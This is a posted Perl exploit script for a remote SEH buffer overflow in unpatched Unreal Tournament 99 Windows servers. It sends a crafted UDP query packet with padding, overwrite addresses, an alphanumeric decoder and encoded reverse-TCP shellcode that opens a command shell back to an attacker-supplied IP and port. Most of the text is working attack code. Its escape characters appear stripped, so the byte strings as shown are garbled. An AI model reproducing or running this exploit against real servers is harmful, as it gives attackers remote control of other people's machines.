
Unreal Tournament Buffer Overflow

Posted on 10 February 2011

# Unreal Tournament Remote Buffer Overflow Exploit (SEH) (Windows) # Discovered by: Luigi Auriemma (http://aluigi.altervista.org/adv/unsecure-adv.txt) # Coded By: Fulcrum (08/02/2011) # # Patch: http://www.unrealadmin.org/forums/showthread.php?t=15616 # Vulnerable: all ut99 servers without a patch. # Tested on: win7 64-bit, xp sp3, vista sp2 with ut v400,436,440,451,451b # # Bad characters: 0x00 0x5c # Maximum shellcode size: 938 bytes # # Thanks to: Metasploit, Heretic, Luigi Auriemma, Peter Van Eeckhoutte & Skylined use IO::Socket::INET; # Header die "Usage: unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port> " unless ($ARGV[3]); # Connect to the server $socket = new IO::Socket::INET(PeerAddr => $ARGV[0],PeerPort => $ARGV[1], Proto => "udp", Timeout => 2) or die; # Convert the reverse ip and port to hex format $reverse_ip_hex = join("", unpack("H*", pack("c*", split(/./, $ARGV[2])))); $reverse_port_hex = unpack("H*", pack("N", $ARGV[3])); # Get the server version $socket->send("\basic\"); $socket->recv($recvmsg, 512, 0); # Create the special packet $packet = "\secure\"; # header if ($recvmsg =~ /gamever\(400|436)/) { $packet .= "x41" x 24; # junk for ut v400,436 } else { $packet .= "x41" x 64; # junk for ut v440,451,451b } $packet .= "xebx06x90x90"; # nseh / short jump to the shellcode if ($recvmsg =~ /gamever\440/) { $packet .= "x61xaex14x10"; # seh / 0x1014AE61 / pop ebx - pop - ret / core.dll v440 } else { $packet .= "x98x53x13x10"; # seh / 0x10135398 / pop esi - pop - retbis / core.dll v400,436,451,451b } $packet .= "x90"; # nop $packet .= "xebx03x59xebx05xe8xf8xffxffxff". "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"; # alphanumeric decoder from Skylined (getEIP code taken from Heretic) $packet .= shellcode_encoder( "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52". "x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26". "x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d". "x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0". 
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b". "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff". "x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d". "xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b". "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44". "x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b". "x12xebx86x5dx68x33x32x00x00x68x77x73x32x5f". "x54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29". "xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50". "x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x68". chr(hex(substr($reverse_ip_hex, 0, 2))). # 1st byte of the ip in hex chr(hex(substr($reverse_ip_hex, 2, 2))). # 2nd byte of the ip in hex chr(hex(substr($reverse_ip_hex, 4, 2))). # 3rd byte of the ip in hex chr(hex(substr($reverse_ip_hex, 6, 2))). # 4th byte of the ip in hex "x68x02x00". chr(hex(substr($reverse_port_hex, 4, 2))). # 1st byte of the port in hex chr(hex(substr($reverse_port_hex, 6, 2))). # 2nd byte of the port in hex "x89xe6x6ax10x56". "x57x68x99xa5x74x61xffxd5x68x63x6dx64x00x89". "xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7". "x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50". "x56x56x56x46x56x4ex56x56x53x56x68x79xccx3f". "x86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1d". "x60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxff". "xd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72". 
"x6fx6ax00x53xffxd5"); # reverse tcp shellcode / ruby msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 P # Send the special packet $socket->send($packet); # Close the connection to the server $socket->close(); exit; # Alphanumeric encoder function from Skylined (Alpha2) sub shellcode_encoder { local $valid_chars, $shellcoded_encoded, $a, $b, $c, $d, $e, $f, $i, $j; $valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; $shellcoded_encoded = ""; for($i=0; $i<length($_[0]); $i++) { $char = hex(unpack("H*", substr($_[0], $i, 1))); $a = ($char & 0xf0) >> 4; $b = ($char & 0x0f); $f = $b; $j = int(rand(length($valid_chars))); while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $f) { $j = ++$j % length($valid_chars); } $e = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4; $d = ($a^$e); $j = int(rand(length($valid_chars))); while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $d) { $j = ++$j % length($valid_chars); } $c = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4; $shellcoded_encoded .= chr(($c<<4)+$d); $shellcoded_encoded .= chr(($e<<4)+$f); } $shellcoded_encoded .= "x41"; return $shellcoded_encoded; }

